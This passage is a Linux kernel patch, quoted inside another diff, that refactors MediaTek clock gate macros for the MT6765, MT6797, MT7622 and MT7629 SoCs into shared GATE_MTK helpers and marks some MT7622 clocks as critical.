+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_LARB2, "img_larb2", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-mipi0a.c b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+index 25c829fc38661..f2b9dc8084801 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mipi0a.c
++++ b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mipi0a_cg_regs = {
+ 	.sta_ofs = 0x80,
+ };
+ 
+-#define GATE_MIPI0A(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mipi0a_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_MIPI0A(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mipi0a_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate mipi0a_clks[] = {
+ 	GATE_MIPI0A(CLK_MIPI0A_CSR_CSI_EN_0A,
+diff --git a/drivers/clk/mediatek/clk-mt6765-mm.c b/drivers/clk/mediatek/clk-mt6765-mm.c
+index bda774668a361..a4570c9dbefa5 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mm.c
++++ b/drivers/clk/mediatek/clk-mt6765-mm.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mm_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_MM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM */
+diff --git a/drivers/clk/mediatek/clk-mt6765-vcodec.c b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+index 2bc1fbde87da9..75d72b9b4032c 100644
+--- a/drivers/clk/mediatek/clk-mt6765-vcodec.c
++++ b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SET0_LARB, "venc_set0_larb", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index e9b9e67297335..665981fc411f5 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -483,32 +483,14 @@ static const struct mtk_gate_regs top2_cg_regs = {
+ 	.sta_ofs = 0x320,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -559,41 +541,17 @@ static const struct mtk_gate_regs ifr5_cg_regs = {
+ 	.sta_ofs = 0xc8,
+ };
+ 
+-#define GATE_IFR2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR4(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR4(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr4_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate ifr_clks[] = {
+ 	/* INFRA_TOPAXI */
+@@ -674,14 +632,8 @@ static const struct mtk_gate_regs apmixed_cg_regs = {
+ 	.sta_ofs = 0x14,
+ };
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,		\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6797-img.c b/drivers/clk/mediatek/clk-mt6797-img.c
+index 7c6a53fbb8be6..06441393478f6 100644
+--- a/drivers/clk/mediatek/clk-mt6797-img.c
++++ b/drivers/clk/mediatek/clk-mt6797-img.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_FDVT, "img_fdvt", "mm_sel", 11),
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 0846011fc8943..99a63f46642fa 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -23,23 +23,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797-vdec.c b/drivers/clk/mediatek/clk-mt6797-vdec.c
+index 6120fccc859f1..8622ddd87a5bb 100644
+--- a/drivers/clk/mediatek/clk-mt6797-vdec.c
++++ b/drivers/clk/mediatek/clk-mt6797-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKEN_ENG, "vdec_cken_eng", "vdec_sel", 8),
+diff --git a/drivers/clk/mediatek/clk-mt6797-venc.c b/drivers/clk/mediatek/clk-mt6797-venc.c
+index 834d3834d2bbc..928d611a476e4 100644
+--- a/drivers/clk/mediatek/clk-mt6797-venc.c
++++ b/drivers/clk/mediatek/clk-mt6797-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_0, "venc_0", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b89f325a4b9b8..78339cb35beb0 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -420,40 +420,22 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x00b0,
+ };
+ 
+-#define GATE_ICG0(_id, _name, _parent, _shift) {		\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra0_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-}
++#define GATE_ICG0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1(_id, _name, _parent, _shift)			\
+-	GATE_ICG1_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra1_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra1_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+-#define GATE_ICG2(_id, _name, _parent, _shift)			\
+-	GATE_ICG2_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra2_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra2_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+ /*
+  * Clock gates dramc and dramc_b are needed by the DRAM controller.
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index 9f2e5aa7b5d9b..b17731fa11445 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -16,41 +16,17 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index 43de0477d5d99..a60190e834186 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[] = {
+ 	GATE_SGMII(CLK_SGMII_TX250M_EN, "sgmii_tx250m_en",
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 67e96231dd25b..55baa6d06a205 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index 3b55f8641fae0..eebbb87906930 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -50,59 +50,28 @@
+ 		 _pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,  \
+ 		 NULL, "clkxtal")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &apmixed_cg_regs,				\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,			\
+-	}
++#define GATE_APMIXED_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &apmixed_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_no_setclr_inv, CLK_IS_CRITICAL)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &infra_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &peri0_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
++
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7622_clk_lock);
+ 
+@@ -350,7 +319,7 @@ static const struct mtk_pll_data plls[] = {
+ };
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+-	GATE_APMIXED(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
++	GATE_APMIXED_AO(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
+ };
+ 
+ static const struct mtk_gate infra_clks[] = {
+@@ -485,7 +454,7 @@ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_AP_DMA_PD, "peri_ap_dma_pd", "axi_sel", 12),
+ 	GATE_PERI0(CLK_PERI_MSDC30_0_PD, "peri_msdc30_0", "msdc30_0_sel", 13),
+ 	GATE_PERI0(CLK_PERI_MSDC30_1_PD, "peri_msdc30_1", "msdc30_1_sel", 14),
+-	GATE_PERI0(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
++	GATE_PERI0_AO(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
+ 	GATE_PERI0(CLK_PERI_UART1_PD, "peri_uart1_pd", "axi_sel", 18),
+ 	GATE_PERI0(CLK_PERI_UART2_PD, "peri_uart2_pd", "axi_sel", 19),
+ 	GATE_PERI0(CLK_PERI_UART3_PD, "peri_uart3_pd", "axi_sel", 20),
+@@ -513,12 +482,12 @@ static struct mtk_composite infra_muxes[] = {
+ 
+ static struct mtk_composite top_muxes[] = {
+ 	/* CLK_CFG_0 */
+-	MUX_GATE(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
+-		 0x040, 0, 3, 7),
+-	MUX_GATE(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
+-		 0x040, 8, 1, 15),
+-	MUX_GATE(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
+-		 0x040, 16, 1, 23),
++	MUX_GATE_FLAGS(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
++		       0x040, 0, 3, 7, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
++		       0x040, 8, 1, 15, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
++		       0x040, 16, 1, 23, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_ETH_SEL, "eth_sel", eth_parents,
+ 		 0x040, 24, 3, 31),
+ 
+@@ -655,10 +624,6 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+ 			       clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_DDRPHYCFG_SEL]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -701,9 +666,6 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_MAIN_CORE_EN]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -730,8 +692,6 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (r)
+ 		return r;
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_PERI_UART0_PD]->clk);
+-
+ 	mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc[1]);
+ 
+ 	return 0;
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index 282dd65594654..b0c8fa3b8bbec 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
